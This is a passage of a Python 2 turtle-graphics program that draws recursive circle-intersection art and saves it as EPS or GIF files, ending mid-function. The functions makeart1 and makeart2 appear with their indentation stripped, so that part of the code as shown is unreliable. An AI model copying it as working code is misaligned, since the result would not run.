        self.realcards=[]
        self.lm.pu()
        for x in range(4):
            self.lm.goto(self.center)
            self.lm.seth(self.lm.towards(0,0)+90*x)
            self.lm.fd(self.radius)
            self.realcards.append(Circle(self.lm.xcor(), self.lm.ycor(), self.radius/2))
    def extendedCards(self, numberOfexteriorCircles):
        """Recursively ring the rim (facing away from origin) with half-radius circles."""
        self.cardinals=[]
        angle=360.0/numberOfexteriorCircles
        for x in range(numberOfexteriorCircles):
            self.lm.pu()
            self.lm.goto(self.center)
            self.lm.seth(self.lm.towards(0,0)+180+x*angle)
            self.lm.fd(self.radius)
            a=Circle(self.lm.xcor(), self.lm.ycor(), self.radius/2, self.lm, self.keep)
            self.cardinals.append(a)
            # Recurse until the child radius shrinks below 4 units.
            if (self.radius/2>=4):
                a.extendedCards(numberOfexteriorCircles)
                for card in a.cardinals:
                    self.cardinals.append(card)
    def innerextendedCards(self, numberOfexteriorCircles):
        """Like extendedCards but heads toward the origin instead of away."""
        self.cardinals=[]
        angle=360.0/numberOfexteriorCircles
        for x in range(numberOfexteriorCircles):
            self.lm.pu()
            self.lm.goto(self.center)
            self.lm.seth(self.lm.towards(0,0)+x*angle)
            self.lm.fd(self.radius)
            a=Circle(self.lm.xcor(), self.lm.ycor(), self.radius/2, self.lm, self.keep)
            self.cardinals.append(a)
            if (self.radius/2>=4):
                a.innerextendedCards(numberOfexteriorCircles)
                for card in a.cardinals:
                    self.cardinals.append(card)
    def differentcards(self, numberOfexteriorCircles):
        """Non-recursive variant: one ring of half-radius circles on the rim."""
        self.cardinals=[]
        angle=360.0/numberOfexteriorCircles
        for x in range(numberOfexteriorCircles):
            self.lm.pu()
            self.lm.goto(self.center)
            self.lm.seth(self.lm.towards(0,0)+180+x*angle)
            self.lm.fd(self.radius)
            self.cardinals.append(Circle(self.lm.xcor(), self.lm.ycor(), self.radius/2, self.lm, self.keep))
    def addCardinals(self):
        """Create four half-radius circles at the N/S/E/W rim points."""
        self.cardinals=[]
        self.cardinals.append(Circle(self.center[0]+self.radius, self.center[1], self.radius/2))
        self.cardinals.append(Circle(self.center[0]-self.radius, self.center[1], self.radius/2))
        self.cardinals.append(Circle(self.center[0], self.center[1]+self.radius, self.radius/2))
        self.cardinals.append(Circle(self.center[0], self.center[1]-self.radius, self.radius/2))
        #for eachcircle in self.cardinals:
        #    eachcircle.draw()
    def comparetoCardinals(self):
        """Create same-radius circles at each intersection with the cardinals.

        NOTE(review): assumes every cardinal actually intersects self —
        circleinter returns None otherwise and indexing would raise.
        """
        self.primarytocardinals=[]
        for eachcircle in self.cardinals:
            intersectionpoints=circleinter(self.center, self.radius, eachcircle.center, eachcircle.radius)
            self.primarytocardinals.append(Circle(intersectionpoints[0][0], intersectionpoints[0][1], self.radius))
            self.primarytocardinals.append(Circle(intersectionpoints[1][0], intersectionpoints[1][1], self.radius))
def checkCircles(circle1, circle2):
    """Intersect two Circle objects.

    Returns the pair of crossing points with coordinates rounded to two
    decimal places, or None when the circles do not intersect.
    """
    global checkcirclescalled
    checkcirclescalled += 1
    hits = circleinter(circle1.center, circle1.radius, circle2.center, circle2.radius)
    if not hits:
        return hits
    return (
        (float("%.2f" % hits[0][0]), float("%.2f" % hits[0][1])),
        (float("%.2f" % hits[1][0]), float("%.2f" % hits[1][1])),
    )
def circleinter(p0, r0, p1, r1):
    """
    This modules accepts two circles and then determines where they meet.
    The circles are submitted as (x, y), r where (x, y) is the center of the
    circle and r is the radius. Returns a pair of (x, y) intersection points,
    or None when the circles are disjoint, nested, or concentric.
    """
    # Unpack in the body rather than in the signature: tuple parameters
    # (`def f((x0, y0), ...)`) are Python 2-only syntax removed by PEP 3113;
    # this form behaves identically on Python 2 and 3 and call sites are
    # unchanged.
    x0, y0 = p0
    x1, y1 = p1
    dx=float(x1-x0)
    dy=float(y1-y0)
    d=(dx**2+dy**2)**0.5
    if (d>(r0+r1)):
        # Too far apart to touch.
        return None
    if (d< math.fabs(r0-r1)):
        # One circle strictly inside the other.
        return None
    if (d==0):
        # Concentric: either no meeting point or infinitely many.
        return None
    # Distance from center 0 to the chord joining the intersection points.
    a = ((r0*r0) - (r1*r1) + (d*d)) / (2.0 * d)
    x2 = x0 + (dx * a/d)
    y2 = y0 + (dy * a/d)
    # Half-length of that chord.
    h = ((r0*r0) - (a*a))**0.5
    rx = -dy * (h/d)
    ry = dx * (h/d)
    xi = x2 + rx
    xi_prime = x2 - rx
    yi = y2 + ry
    yi_prime = y2 - ry
    return (xi,yi),(xi_prime,yi_prime)
def differentCircles(primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta,lm=None):
    """Draw a primary circle ringed by secondaries, then repeatedly spawn
    half-radius circles at every pairwise intersection until no new circle
    (radius >= 10) appears; save the result as an EPS under circles/.

    NOTE(review): Python 2 code — the /MINOFFSET*MINOFFSET grid snap and
    radius halving rely on integer division.
    """
    # Encode all four parameters into the output filename.
    filenameStrings=['primaryCircleRadius','secondaryCircleRadius','numberOfSecondaryCircles','secondaryCircleTheta']
    filenameValues=[primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta]
    filenameZip=zip(filenameStrings,filenameValues)
    filename=''
    for values in filenameZip:
        filename=filename+values[0]+str(values[1])
    filename='circles/'+filename+'.eps'
    if not lm:
        lm=fvh2.fvh.MyTurtle()
        lm.setup()
        lm.tracer(False)
    ts=lm.getscreen()
    circlelist=[]
    newlist=[]
    primaryCircle=Circle(0,0,primaryCircleRadius,lm)
    primaryCircle.draw()
    circlelist.append(primaryCircle)
    # Ring of secondary circles spaced secondaryCircleTheta degrees apart.
    for circle in range(numberOfSecondaryCircles):
        lm.pu()
        lm.goto(primaryCircle.center)
        lm.seth(circle*secondaryCircleTheta)
        lm.fd(primaryCircleRadius)
        temp=Circle(lm.xcor(), lm.ycor(), secondaryCircleRadius, lm)
        temp.draw()
        circlelist.append(temp)
    totalbefore=len(circlelist)
    totalafter=0
    counter=0
    # Fixed point iteration: stop when a full pass adds no new circle.
    while(totalbefore!=totalafter):
        totalbefore=len(circlelist)
        for firstCircleplace in range(len(circlelist)):
            firstCircle=circlelist[firstCircleplace]
            # Start at firstCircleplace so each unordered pair is checked once.
            for secondCircleplace in range(firstCircleplace,len(circlelist)):
                secondCircle=circlelist[secondCircleplace]
                thisRadius=min(firstCircle.radius, secondCircle.radius)/2
                if (thisRadius<10):
                    continue
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    # Skip intersections already covered by the grid-snapped registry.
                    if ((int(newCircles[0][0])/MINOFFSET*MINOFFSET,int(newCircles[0][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
                        temp=Circle(newCircles[0][0], newCircles[0][1], thisRadius,lm)
                        temp.draw()
                        newlist.append(temp)
                    if ((int(newCircles[1][0])/MINOFFSET*MINOFFSET,int(newCircles[1][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
                        temp=Circle(newCircles[1][0], newCircles[1][1], thisRadius,lm)
                        temp.draw()
                        newlist.append(temp)
            ts.update()
        counter=len(circlelist)
        for item in newlist:
            item.draw()
            circlelist.append(item)
        ts.update()
        newlist=[]
        totalafter=len(circlelist)
    fvh2.savetocircles(lm,filename)
def differentCirclesforViewing(primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta,lm=None):
    """
    This is designed with something like the following in mind:
    lm=circleint.fvh2.fvh.MyTurtle()
    for a in range(2,100):
        for b in range(3600):
            circleint.differentCirclesforAnimation(200,15,a,b/10.0,lm)
            lm.clear()
    and then make a gif of the results
    """
    # Unlike differentCircles, reset the global de-dup registry per frame.
    global masterCircleSet
    masterCircleSet=set()
    filenameStrings=['primaryCircleRadius','secondaryCircleRadius','numberOfSecondaryCircles','secondaryCircleTheta']
    filenameValues=[primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta]
    filenameZip=zip(filenameStrings,filenameValues)
    filename=''
    for values in filenameZip:
        # Zero-pad values so frame filenames sort correctly for animation.
        filename=filename+values[0]+'%03d' % values[1]
    filename='circles/testa/'+filename+'.eps'
    if not lm:
        lm=fvh2.fvh.MyTurtle()
        lm.setup()
        lm.tracer(False)
    ts=lm.getscreen()
    circlelist=[]
    newlist=[]
    primaryCircle=Circle(0,0,primaryCircleRadius,lm)
    primaryCircle.draw()
    circlelist.append(primaryCircle)
    # Cycle through fvh.allcolors so each new circle gets a distinct color.
    colorcounter=0
    for circle in range(numberOfSecondaryCircles):
        lm.pu()
        lm.goto(primaryCircle.center)
        lm.seth((secondaryCircleTheta+(circle*secondaryCircleTheta))%360)
        lm.fd(primaryCircleRadius)
        temp=Circle(lm.xcor(), lm.ycor(), secondaryCircleRadius, lm)
        temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
        colorcounter+=1
        temp.draw()
        circlelist.append(temp)
    totalbefore=len(circlelist)
    totalafter=0
    counter=0
    # Iterate until a full pass adds no new circle (radius >= 10).
    while(totalbefore!=totalafter):
        totalbefore=len(circlelist)
        for firstCircleplace in range(len(circlelist)):
            firstCircle=circlelist[firstCircleplace]
            for secondCircleplace in range(len(circlelist)):
                secondCircle=circlelist[secondCircleplace]
                thisRadius=min(firstCircle.radius, secondCircle.radius)/2
                if (thisRadius<10):
                    continue
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    if ((int(newCircles[0][0])/MINOFFSET*MINOFFSET,int(newCircles[0][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
                        temp=Circle(newCircles[0][0], newCircles[0][1], thisRadius,lm)
                        temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
                        colorcounter+=1
                        temp.draw()
                        newlist.append(temp)
                    if ((int(newCircles[1][0])/MINOFFSET*MINOFFSET,int(newCircles[1][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
                        temp=Circle(newCircles[1][0], newCircles[1][1], thisRadius,lm)
                        temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
                        colorcounter+=1
                        temp.draw()
                        newlist.append(temp)
            ts.update()
            #masterCircleSet=set()
        counter=len(circlelist)
        for item in newlist:
            #item.draw()
            circlelist.append(item)
        ts.update()
        newlist=[]
        totalafter=len(circlelist)
    #fvh2.savetocircles(lm,filename,aheight=(primaryCircleRadius+secondaryCircleRadius),awidth=(primaryCircleRadius+secondaryCircleRadius),ax=-(primaryCircleRadius+secondaryCircleRadius)/2.0, ay=-(primaryCircleRadius+secondaryCircleRadius)/2.0 )
    fvh2.savetocircles(lm,filename,togif=True)#,aheight=(primaryCircleRadius+secondaryCircleRadius),awidth=(primaryCircleRadius+secondaryCircleRadius))#,ax=-(primaryCircleRadius+secondaryCircleRadius)/2.0, ay=-(primaryCircleRadius+secondaryCircleRadius)/2.0 )
def differentCirclesforAnimation(primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta,lm=None):
    """
    This is designed with something like the following in mind:
    lm=circleint.fvh2.fvh.MyTurtle()
    for a in range(2,100):
        for b in range(3600):
            circleint.differentCirclesforAnimation(200,15,a,b/10.0,lm)
            lm.clear()
    and then make a gif of the results
    """
    # NOTE(review): unlike differentCirclesforViewing, masterCircleSet is
    # NOT reset here, so de-duplication accumulates across frames.
    filenameStrings=['primaryCircleRadius','secondaryCircleRadius','numberOfSecondaryCircles','secondaryCircleTheta']
    filenameValues=[primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta]
    filenameZip=zip(filenameStrings,filenameValues)
    filename=''
    for values in filenameZip:
        filename=filename+values[0]+str(values[1])
    filename='circles/neatani/'+filename+'.eps'
    if not lm:
        lm=fvh2.fvh.MyTurtle()
        lm.setup()
        lm.tracer(False)
    ts=lm.getscreen()
    circlelist=[]
    newlist=[]
    primaryCircle=Circle(0,0,primaryCircleRadius,lm)
    # The primary circle participates in intersections but is not drawn.
    #primaryCircle.draw()
    circlelist.append(primaryCircle)
    colorcounter=0
    for circle in range(numberOfSecondaryCircles):
        lm.pu()
        lm.goto(primaryCircle.center)
        lm.seth((secondaryCircleTheta+(circle*secondaryCircleTheta))%360)
        lm.fd(primaryCircleRadius)
        temp=Circle(lm.xcor(), lm.ycor(), secondaryCircleRadius, lm)
        temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
        colorcounter+=1
        temp.draw()
        circlelist.append(temp)
    totalbefore=len(circlelist)
    totalafter=0
    counter=0
    # Iterate until a full pass adds no new circle (radius >= 10).
    while(totalbefore!=totalafter):
        totalbefore=len(circlelist)
        for firstCircleplace in range(len(circlelist)):
            firstCircle=circlelist[firstCircleplace]
            # Start at firstCircleplace so each unordered pair is checked once.
            for secondCircleplace in range(firstCircleplace,len(circlelist)):
                secondCircle=circlelist[secondCircleplace]
                thisRadius=min(firstCircle.radius, secondCircle.radius)/2
                if (thisRadius<10):
                    continue
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    if ((int(newCircles[0][0])/MINOFFSET*MINOFFSET,int(newCircles[0][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
                        temp=Circle(newCircles[0][0], newCircles[0][1], thisRadius,lm)
                        temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
                        colorcounter+=1
                        temp.draw()
                        newlist.append(temp)
                    if ((int(newCircles[1][0])/MINOFFSET*MINOFFSET,int(newCircles[1][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
                        temp=Circle(newCircles[1][0], newCircles[1][1], thisRadius,lm)
                        temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
                        colorcounter+=1
                        temp.draw()
                        newlist.append(temp)
            ts.update()
        counter=len(circlelist)
        for item in newlist:
            #item.draw()
            circlelist.append(item)
        ts.update()
        newlist=[]
        totalafter=len(circlelist)
    #fvh2.savetocircles(lm,filename)
def createDrawing(bigdiameter,diameter):
    """Seed one big and one small circle, then repeatedly add same-`diameter`
    circles at every pairwise intersection until nothing new appears or the
    registry reaches 750 entries; save the drawing.

    NOTE(review): Python 2 code (print statements, integer division).
    """
    lm=fvh2.fvh.MyTurtle()
    lm.setup()
    lm.tracer(False)
    a=Circle(0,0,bigdiameter,lm)
    b=Circle(bigdiameter,0,diameter,lm)
    circlelist=[a,b]
    totalbefore=len(masterCircleSet)
    totalafter=0
    newlist=[]
    counter=0
    #print totalbefore
    # Cap the drawing at 750 registered circles to bound the runtime.
    while((totalbefore!=totalafter) and (len(masterCircleSet)<750)):
        #print (circlecalled, checkcirclescalled)
        #print totalbefore, totalafter
        #raw_input()
        print len(masterCircleSet)
        totalbefore=len(masterCircleSet)
        # `counter` skips circles already compared in earlier passes.
        for firstCircleplace in range(counter,len(circlelist)):
            firstCircle=circlelist[firstCircleplace]
            for secondCircleplace in range(len(circlelist)):
                secondCircle=circlelist[secondCircleplace]
                newCircles=checkCircles(firstCircle, secondCircle)
                #print newCircles, len(newlist)
                #raw_input((totalbefore,totalafter))
                if newCircles:
                    if ((int(newCircles[0][0])/MINOFFSET*MINOFFSET,int(newCircles[0][1])/MINOFFSET*MINOFFSET,diameter) not in masterCircleSet):
                        newlist.append(Circle(newCircles[0][0], newCircles[0][1], diameter,lm))
                    else:
                        print newCircles[0]
                    if ((int(newCircles[1][0])/MINOFFSET*MINOFFSET,int(newCircles[1][1])/MINOFFSET*MINOFFSET,diameter) not in masterCircleSet):
                        newlist.append(Circle(newCircles[1][0], newCircles[1][1], diameter,lm))
                    else:
                        print newCircles[1]
        counter=len(circlelist)
        for item in newlist:
            item.draw()
            circlelist.append(item)
        newlist=[]
        totalafter=len(masterCircleSet)
    lm.tracer(True)
    a.lm.tracer(True)
    fvh2.savetocircles(a.lm)
def createanotherdrawing(startSize):
    """Seed a circle plus its four cardinals, then keep adding half-min-radius
    circles at pairwise intersections until the registry stops growing.

    NOTE(review): Python 2 code (print statements, integer division).
    NOTE(review): `newlist` is appended to circlelist at the end of each pass
    but nothing is ever added to it — new circles go straight into circlelist
    inside the loop; the newlist plumbing looks vestigial.
    """
    a=Circle(0,0,startSize)
    smallestsize=startSize
    a.addCardinals()
    # Undo the construction strokes of the seed and its cardinals.
    a.lm.undo()
    a.lm.undo()
    circlelist=[]
    circlelist.append(a)
    for eachitem in a.cardinals:
        circlelist.append(eachitem)
        eachitem.lm.undo()
        eachitem.lm.undo()
    totalbefore=len(masterCircleSet)
    totalafter=0
    while ((totalbefore!=totalafter)):
        print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
        totalbefore=len(masterCircleSet)
        newlist=[]
        for firstCircle in circlelist:
            for secondCircle in circlelist:
                thisDiameter=min(firstCircle.radius, secondCircle.radius)/2
                if (thisDiameter<=1):
                    #print "first break"
                    break
                if thisDiameter<smallestsize:
                    smallestsize=thisDiameter
                    print "New Smallest Size: "+ str(smallestsize)
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    for x in newCircles:
                        if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
                            newCircle=Circle(x[0], x[1],thisDiameter)
                            newCircle.draw()
                            circlelist.append(newCircle)
                            #for eachCard in newCircle.cardinals:
                            #    circlelist.append(eachCard)
            #if (thisDiameter<=1):
            #    print "second break"
        for item in newlist:
            circlelist.append(item)
        totalafter=len(masterCircleSet)
        if (totalafter==totalbefore):
            print "no more moves"
    fvh2.savetocircles(a.lm)
def yetanotherdrawing(startdiameter,numberofoutsidecircles):
    # Variant using differentcards(n) to place `numberofoutsidecircles`
    # neighbours around the seed. Circles are collected first (appending to
    # circlelist while iterating it) and all drawn in one batch at the end.
    lm=fvh2.fvh.MyTurtle()
    lm.setup()
    lm.tracer(False)  # no animation while generating
    smallestsize=startdiameter
    a=Circle(0,0,startdiameter,lm)
    a.lm.undo()
    a.lm.undo()
    a.differentcards(numberofoutsidecircles)
    circlelist=[]
    circlelist.append(a)
    for eachitem in a.cardinals:
        eachitem.lm.undo()
        eachitem.lm.undo()
        circlelist.append(eachitem)
    totalbefore=len(masterCircleSet)
    totalafter=0
    while ((totalbefore!=totalafter)):
        print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
        totalbefore=len(masterCircleSet)
        newlist=[]
        for firstCircle in circlelist:
            print "new firstCircle : " + str(firstCircle.checkString)
            print "Current number of circles in circlelist: "+str(len(circlelist))
            for secondCircle in circlelist:
                # True division here (unlike createanotherdrawing's /2).
                thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
                if (thisDiameter<=1):
                    break  # size floor for this firstCircle
                if thisDiameter<smallestsize:
                    smallestsize=thisDiameter
                    print "New Smallest Size: "+ str(smallestsize)
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    for x in newCircles:
                        if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
                            newCircle=Circle(x[0], x[1],thisDiameter,lm)
                            # Appended directly; drawing is deferred to the
                            # batch loop after the while.
                            circlelist.append(newCircle)
        # NOTE(review): newlist stays empty in this variant — dead template
        # code, same as in createanotherdrawing.
        for item in newlist:
            circlelist.append(item)
        newlist=[]
        totalafter=len(masterCircleSet)
        if (totalafter==totalbefore):
            print "no more moves"
    # Render everything in one pass now that generation is finished.
    for acircle in circlelist:
        acircle.draw()
    lm.tracer(True)
    fvh2.savetocircles(a.lm)
def yetanotherdrawingagain(startdiameter,numberofoutsidecircles, recursive=False, lm=None):
    # Two-level seed (cardinals and their cardinals), then the usual
    # pair-intersection expansion. New circles are buffered in newlist per
    # pass; with recursive=True each new circle also contributes its own
    # cardinal ring. An existing turtle may be passed in (used by makeart1);
    # otherwise one is created and set up here.
    global masterCircleSet
    masterCircleSet=set()  # reset dedupe state so repeated calls start fresh
    if not lm:
        lm=fvh2.fvh.MyTurtle()
        lm.setup()
    lm.tracer(False)
    smallestsize=startdiameter
    a=Circle(0,0,startdiameter,lm)
    a.differentcards(numberofoutsidecircles)
    circlelist=[]
    circlelist.append(a)
    for eachitem in a.cardinals:
        eachitem.differentcards(numberofoutsidecircles)
        for subitem in eachitem.cardinals:
            circlelist.append(subitem)
        circlelist.append(eachitem)
    totalbefore=len(masterCircleSet)
    totalafter=0
    while ((totalbefore!=totalafter)):
        totalbefore=len(masterCircleSet)
        newlist=[]
        for firstCircle in circlelist:
            for secondCircle in circlelist:
                thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
                # Floor test is on the parent radius here, not thisDiameter.
                if (min(firstCircle.radius, secondCircle.radius)<=1):
                    break
                if thisDiameter<smallestsize:
                    smallestsize=thisDiameter
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    for x in newCircles:
                        if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
                            newCircle=Circle(x[0], x[1],thisDiameter,lm)
                            newlist.append(newCircle)
                            if recursive:
                                # Also surround each new circle with its own
                                # ring; those join circlelist immediately.
                                newCircle.differentcards(numberofoutsidecircles)
                                for eachCard in newCircle.cardinals:
                                    circlelist.append(eachCard)
        # Draw this pass's batch and make it pairable next pass.
        for item in newlist:
            item.draw()
            circlelist.append(item)
        newlist=[]
        totalafter=len(masterCircleSet)
        if (totalafter==totalbefore):
            print "no more moves"
    lm.tracer(True)
    fvh2.savetocircles(a.lm)
def yetanotherdrawingagainwithmax(startdiameter,numberofoutsidecircles, recursive=False, lm=None,stepsize=2):
    # Like yetanotherdrawingagain but the shrink factor is parameterized
    # (child diameter = min(parent radii)/stepsize) and circles are drawn
    # immediately as they are created instead of batched per pass. Used by
    # makeart2, which passes its own turtle.
    global masterCircleSet
    masterCircleSet=set()  # reset dedupe state for a fresh drawing
    if not lm:
        lm=fvh2.fvh.MyTurtle()
        lm.setup()
    lm.tracer(False)
    smallestsize=startdiameter
    # Extra False argument to Circle() here — presumably suppresses an
    # initial draw; confirm against Circle.__init__.
    a=Circle(0,0,startdiameter,lm,False)
    a.differentcards(numberofoutsidecircles)
    circlelist=[]
    circlelist.append(a)
    for eachitem in a.cardinals:
        eachitem.differentcards(numberofoutsidecircles)
        for subitem in eachitem.cardinals:
            circlelist.append(subitem)
        circlelist.append(eachitem)
    totalbefore=len(masterCircleSet)
    totalafter=0
    while ((totalbefore!=totalafter)):
        totalbefore=len(masterCircleSet)
        newlist=[]
        for firstCircle in circlelist:
            for secondCircle in circlelist:
                thisDiameter=min(firstCircle.radius, secondCircle.radius)/float(stepsize)
                if (min(firstCircle.radius, secondCircle.radius)<=1):
                    break  # parent too small; stop scanning its partners
                if thisDiameter<smallestsize:
                    smallestsize=thisDiameter
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    for x in newCircles:
                        if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
                            newCircle=Circle(x[0], x[1],thisDiameter,lm)
                            newCircle.draw()
                            # Appended while circlelist is being iterated, so
                            # the current pass also visits the new circle.
                            circlelist.append(newCircle)
                            if recursive:
                                newCircle.differentcards(numberofoutsidecircles)
                                for eachCard in newCircle.cardinals:
                                    eachCard.draw()
                                    circlelist.append(eachCard)
        # NOTE(review): newlist is never filled in this variant; dead
        # template code.
        for item in newlist:
            circlelist.append(item)
        newlist=[]
        totalafter=len(masterCircleSet)
        if (totalafter==totalbefore):
            print "no more moves"
    lm.tracer(True)
    fvh2.savetocircles(a.lm)
def yadwm(startdiameter):
    # "yet another drawing with max": unlike the min-based variants, the
    # child diameter is max(parent radii)/2.0 and the size floor is 32.
    # Every new circle also gets its full cardinal ring drawn and added.
    smallestsize=startdiameter
    a=Circle(0,0,startdiameter)
    a.addCardinals()
    a.lm.undo()
    a.lm.undo()
    circlelist=[]
    circlelist.append(a)
    for eachitem in a.cardinals:
        eachitem.lm.undo()
        eachitem.lm.undo()
        circlelist.append(eachitem)
    totalbefore=len(masterCircleSet)
    totalafter=0
    while ((totalbefore!=totalafter)):
        print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
        totalbefore=len(masterCircleSet)
        newlist=[]
        for firstCircle in circlelist:
            for secondCircle in circlelist:
                # max() here — children scale with the LARGER parent.
                thisDiameter=max(firstCircle.radius, secondCircle.radius)/2.0
                if (thisDiameter<=32):
                    break  # coarser floor than the other variants
                if thisDiameter<smallestsize:
                    smallestsize=thisDiameter
                    print "New Smallest Size: "+ str(smallestsize)
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    for x in newCircles:
                        if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
                            newCircle=Circle(x[0], x[1],thisDiameter)
                            newCircle.addCardinals()
                            newCircle.draw()
                            circlelist.append(newCircle)
                            for eachCard in newCircle.cardinals:
                                eachCard.draw()
                                circlelist.append(eachCard)
        # NOTE(review): newlist never populated here; dead template code.
        for item in newlist:
            circlelist.append(item)
        totalafter=len(masterCircleSet)
        if (totalafter==totalbefore):
            print "no more moves"
    fvh2.savetocircles(a.lm)
def makeart1():
for size in range(7,11):
for numberofsides in range(1,10):
for recursive in (False, True):
print 2**size,numberofsides,recursive
lm=fvh2.fvh.MyTurtle()
ts=lm.getscreen()
ts.screensize(2**(size+2),2**(size+2),'grey50')
ts.setup(2**(size+3),2**(size+3),0,0)
yetanotherdrawingagain(2**size,numberofsides,recursive,lm)
tc=ts.getcanvas()
filename="circles/startSize"+str(size)+"numberofsides"+str(numberofsides)+str(recursive)+'.eps'
ts.update()
tc.postscript(file=filename, height=2**(size+2), width=2**(size+2),x=-2**(size+1),y=-2**(size+1))
ts.bye()
def makeart2():
for size in range(8,11):
for numberofsides in range(6,10):
for recursive in (False, True):
for stepsize in range(2,4):
print stepsize**size,numberofsides,recursive
lm=fvh2.fvh.MyTurtle()
ts=lm.getscreen()
ts.screensize(stepsize**(size+2),stepsize**(size+2),'grey50')
ts.setup(stepsize**(size+3),stepsize**(size+3),0,0)
yetanotherdrawingagainwithmax(stepsize**size,numberofsides,recursive,lm,stepsize)
tc=ts.getcanvas()
filename="circles/max"+str(size)+str(numberofsides)+str(recursive)+'.eps'
tc.postscript(file=filename, height=stepsize**(size+2), width=stepsize**(size+2),x=-stepsize**(size+1),y=-stepsize**(size+1))
ts.bye()
def yetanotherdrawingagainwithcontinue(startdiameter,numberofoutsidecircles, recursive=False, lm=None):
    # Like yetanotherdrawingagain, except the small-circle guard uses
    # `continue` (skip this pair, keep scanning the rest of circlelist)
    # instead of `break`, the floor is 4 rather than 1, and the seed circles
    # are drawn (then their strokes undone) during setup.
    global masterCircleSet
    masterCircleSet=set()  # fresh dedupe state per call
    if not lm:
        lm=fvh2.fvh.MyTurtle()
        lm.setup()
    lm.tracer(False)
    smallestsize=startdiameter
    a=Circle(0,0,startdiameter,lm)
    a.draw()
    a.lm.undo()
    a.lm.undo()
    a.differentcards(numberofoutsidecircles)
    circlelist=[]
    circlelist.append(a)
    for eachitem in a.cardinals:
        eachitem.draw()
        eachitem.lm.undo()
        eachitem.lm.undo()
        eachitem.differentcards(numberofoutsidecircles)
        for subitem in eachitem.cardinals:
            subitem.draw()
            subitem.lm.undo()
            subitem.lm.undo()
            circlelist.append(subitem)
        circlelist.append(eachitem)
    totalbefore=len(masterCircleSet)
    totalafter=0
    while ((totalbefore!=totalafter)):
        totalbefore=len(masterCircleSet)
        newlist=[]
        for firstCircle in circlelist:
            for secondCircle in circlelist:
                thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
                if (min(firstCircle.radius, secondCircle.radius)<=4):
                    # Skip just this pair; later partners may still be big
                    # enough (the break variants would abandon them).
                    continue
                if thisDiameter<smallestsize:
                    smallestsize=thisDiameter
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    for x in newCircles:
                        if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
                            newCircle=Circle(x[0], x[1],thisDiameter,lm)
                            newCircle.draw()
                            newlist.append(newCircle)
                            if recursive:
                                newCircle.differentcards(numberofoutsidecircles)
                                for eachCard in newCircle.cardinals:
                                    eachCard.draw()
                                    circlelist.append(eachCard)
        # Make this pass's batch pairable in the next pass.
        for item in newlist:
            circlelist.append(item)
        newlist=[]
        totalafter=len(masterCircleSet)
        if (totalafter==totalbefore):
            print "no more moves"
    lm.tracer(True)
    fvh2.savetocircles(a.lm)
def yetanotherdrawingagainwithcontinueandextended(startdiameter,numberofoutsidecircles, recursive=False, lm=None):
    # `continue`-guarded variant that seeds with extendedCards() (one level
    # of cardinals only) and returns the final circle list to the caller.
    # No tracer toggling here, unlike the sibling variants.
    global masterCircleSet
    masterCircleSet=set()  # fresh dedupe state per call
    if not lm:
        lm=fvh2.fvh.MyTurtle()
        lm.setup()
    smallestsize=startdiameter
    a=Circle(0,0,startdiameter,lm)
    a.extendedCards(numberofoutsidecircles)
    circlelist=[]
    circlelist.append(a)
    for eachitem in a.cardinals:
        circlelist.append(eachitem)
    totalbefore=len(masterCircleSet)
    totalafter=0
    while ((totalbefore!=totalafter)):
        print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
        totalbefore=len(masterCircleSet)
        newlist=[]
        for firstCircle in circlelist:
            for secondCircle in circlelist:
                thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
                if (min(firstCircle.radius, secondCircle.radius)<=4):
                    continue  # this pair too small; try remaining partners
                if thisDiameter<smallestsize:
                    smallestsize=thisDiameter
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    for x in newCircles:
